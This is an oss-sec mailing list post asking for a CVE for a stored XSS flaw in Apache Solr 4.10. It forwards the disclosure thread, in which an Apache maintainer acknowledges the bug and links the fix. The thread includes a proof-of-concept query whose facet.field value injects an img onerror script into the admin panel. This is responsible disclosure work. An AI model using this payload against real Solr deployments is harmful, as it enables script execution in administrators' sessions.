oss-sec mailing list archives
CVE Request - Apache Solr 4.10
From: Puneeth Gowda <puneethis021 () gmail com>
Date: Sun, 15 Mar 2015 14:30:44 +0530
Hi, Please assign a CVE for this issue : Software : Apache Solr Version : 4.10 Thanks Puneeth FYI, ---------- Forwarded message ---------- From: Puneeth Gowda <puneethis021 () gmail com> Date: Tue, Nov 18, 2014 at 8:30 AM Subject: Re: Security Vulnerability in Solr v4.10 To: Stefan Matheis <steffkes () apache org> Hello Stefan, Patch is working fine.. Issue has been fixed now. Thanks Puneeth On Fri, Nov 14, 2014 at 1:51 AM, Stefan Matheis <steffkes () apache org> wrote:
Hi Puneeth I'm really sorry about the late reply - this is my first CVE i'm handling, so i'm trying to do it properly and wanted to ensure that everything is working according to plans & ASF agenda. The CVE you've asked about is CSV-2014-3628, the fix i was working on already is committed to trunk, you can have a look at the applied changes at https://issues.apache.org/jira/browse/SOLR-6738 . I'd be happy to know if that covers all the cases you've discovered or if there are more that i've missed with this fix! -Stefan On Sunday, November 2, 2014 at 8:38 AM, Puneeth Gowda wrote: Hi Stefan, Thank you for your response. I'd really appreciate if you could assign a CVE to this bug. ! Thanks puneeth On Sun, Nov 2, 2014 at 4:52 AM, Stefan Matheis <steffkes () apache org> wrote: Hi Puneeth Sorry for the late response, thanks for reporting this vulnerability - i'm hereby acknowledging it on behalf of the Lucene PMC. We have investigated your report and accept it. I'm already working on a fix. -Stefan -------- Original Message -------- Subject: Security Vulnerability in Solr v4.10 Date: Wed, 29 Oct 2014 16:57:06 +0530 From: Puneeth Gowda <puneethis021 () gmail com> To: security () apache org Hi, I would like to report a stored xss vulnerability in solr web app version : 4.10 ################################################### Vulnerability Name : Stored XSS Software : Apache Solr Version : 4.10 ################################################### POC: Steps: 1)Search with following query : fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20& json.nl <http://json.nl=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=jsonFinal URL : http://localhost:8080/solr/ <app>/select?fq=lang%3A1&fq=%3A1&facet=true&facet.field="}<img src=a onerror=alert(xss)>&facet.date=dateline&facet.date.start=2006-01-01T00%3A00%3A00.000Z%2FDAY&facet.date.end=2014-01-20T00%3A00%3A00.000Z%2FDAY%2B1DAY&facet.date.gap=%2B1DAY&facet.mincount=1&f.title.facet.limit=20& json.nl <http://json.nl=map&sort=dateline%20desc&rows=1&facet_ranges=&q=*:*&wt=json2) Now browse to Solr Admin panel URL: http://localhost:8080/solr/ Click on Plugins/stats after selecting <core> from the drop down. Browser displays popup. Reason : The parameter "fieldvalucache" stores all searched queries without sanitizing, which results in execution of javascript. Thanks Puneeth
Current thread:
- CVE Request - Apache Solr 4.10 Puneeth Gowda (Mar 15)